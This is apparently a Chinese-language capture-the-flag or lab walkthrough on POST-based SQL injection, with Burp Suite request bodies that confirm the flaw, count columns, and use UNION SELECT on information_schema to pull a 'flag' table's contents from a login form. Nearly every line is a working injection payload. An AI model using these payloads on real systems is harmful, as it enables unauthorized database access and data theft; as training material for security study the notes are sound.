Post注入
用burpsuit抓包去做
Post第一关:(gxa5)
1.判断是否存在注入
username=1'or 1=1 #&password=123&submit=%E7%99%BB%E5%BD%95?有回显
username=1'or 1=2?#&password=123&submit=%E7%99%BB%E5%BD%95?没有回显
则证明存在sql注入
2.判断字段数
username=1'or 1=1 order by 4 #&password=123&submit=%E7%99%BB%E5%BD%95?没有回显
username=1'or 1=1 order by 3?#&password=123&submit=%E7%99%BB%E5%BD%95?有回显
则证明字段数是3
3.用union查询判断回显点
username=1'union select 1,2,3 -- a&password=123&submit=%E7%99%BB%E5%BD%95
4.查出当前数据库名
username=1'union select 1,database(),3 -- a&password=123&submit=%E7%99%BB%E5%BD%95
5.查询当前数据库中的表名
username=1'union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema='security' -- a&password=123&submit=%E7%99%BB%E5%BD%95
6.查询flag表中的字段名
username=1'union select 1,database(),group_concat(column_name) from information_schema.columns where table_schema='security'and table_name='flag' -- a&password=123&submit=%E7%99%BB%E5%BD%95
7.查字段里面的数据
username=1'union select 1,group_concat(id),group_concat(flag) from flag -- a&password=123&submit=%E7%99%BB%E5%BD%95